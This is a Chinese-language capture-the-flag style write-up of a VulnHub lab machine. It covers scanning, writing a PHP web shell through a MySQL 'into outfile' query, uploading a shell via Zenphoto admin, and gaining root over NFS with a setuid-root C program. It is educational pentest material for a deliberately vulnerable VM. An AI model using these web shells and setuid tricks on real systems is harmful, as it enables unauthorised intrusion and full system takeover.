带妹玩转vulnhub（十一）

前言

国庆第四天œ∑´

千金散尽还复来

主机发现

netdiscover -r 192.168.43.0/24

端口扫描

nmap -A -p- -T4 192.168.43.232

渗透测试

80端口查看，emm没什么发现，针对smb服务我们可以使用enum4linux进行扫描，同样的使用dirb扫描一下目录

可以看到backup目录，可以看到这应该是个网站的源码，下载下来，但是ssh.bak下载不下来，应该是权限的问题，可以看到数据库的用户名和密码，我们可以通过此登录phpmyadmin

我们尝试通过上传一个php shell到web中

select "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"

此时出现如下报错信息

#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

可以去百度一下，大概意思就是文件的操作权限和用户所拥有的权限是一样的。因此phpmyadmin这条路大概是走不通了。 这里我需要推荐一个字典列表这是别人收集整理的，感觉十分的好用。

接下来我们访问

http://192.168.43.236/zenphoto/

网站看看有什么发现。 这是一个zenphoto的网站

关于这个框架的漏洞我们找到了很多。

但是经过尝试，似乎并没有这么麻烦，通过之前拿到的数据库的用户名和密码，进行登录，然后新建一个管理员进行登录，可以看到有一个上传按钮，我们可以通过上传一个shell然后访问即可。

使用msf生成shell，并建立连接

提权

接下来就是需要提权获取root权限了，中间有一下flag我就不进行获取了，反正最终的目的是为了获取root权限。 我测试了许多本地提权漏洞，但好像都过于麻烦，并且不起作用，经过查看WP，我发现我们可以通过NSF来达到我们的目的。 首先需要安装NSF服务

apt-get install nfs-common

如下命令

showmount --exports 192.168.43.236

显示远程nsf所挂在的文件夹

monut -t nsf 192.168.43.236:/tmp /tmp/nsf

将远程文件夹挂在到本地 通过msf上传shell.c

int main(void){

setresuid(0, 0, 0);

system("/bin/bash");

}

并生成gcc shell.c -o shell文件，通过挂载在kali中

chown root:root shell chmod 4777 shell

然后回到www-data中运行shell程序，即可获取到root 这里我只想说明一下

chmod 4777 shell

的作用 可以参考这里

https://major.io/2007/02/13/chmod-and-the-mysterious-first-octet/

4代表setuid也就是告诉操作系统，你使用该程序所有者的权限去运行它，所以我们可以通过此获取到root权限。

总结

好好赚钱，挣钱养家?，包养萌妹，走向人生巅峰?

参考文章

https://medium.com/@Kan1shka9/hackfest2016-orcus-walkthrough-9c290bad7315